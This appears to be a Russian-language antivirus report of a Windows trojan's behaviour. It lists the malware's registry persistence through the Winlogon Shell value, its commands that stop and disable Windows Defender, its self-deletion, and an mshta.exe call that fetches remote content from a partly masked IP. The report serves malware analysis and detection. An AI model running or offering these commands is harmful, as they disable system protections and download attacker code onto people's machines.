Техническая информация
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = '%APPDATA%\dvedrq.exe'
- Системный антивирус (Защитник Windows)
- Компонент восстановления системы (SR)
- %APPDATA%\dvedrq.exe
- '78.##.187.35':80
- '%APPDATA%\dvedrq.exe'
- '%WINDIR%\syswow64\sc.exe' stop WinDefend' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' config WinDefend start= disabled' (со скрытым окном)
- '%APPDATA%\dvedrq.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c del "<Полный путь к файлу>" >> NUL' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' "http://78.##.187.35/soft-usage/favicon.ico?0=##########################################################"' (со скрытым окном)
- '%WINDIR%\syswow64\sc.exe' stop WinDefend
- '%WINDIR%\syswow64\sc.exe' config WinDefend start= disabled
- '%WINDIR%\syswow64\cmd.exe' /c del "<Полный путь к файлу>" >> NUL
- '%WINDIR%\syswow64\mshta.exe' "http://78.##.187.35/soft-usage/favicon.ico?0=##########################################################"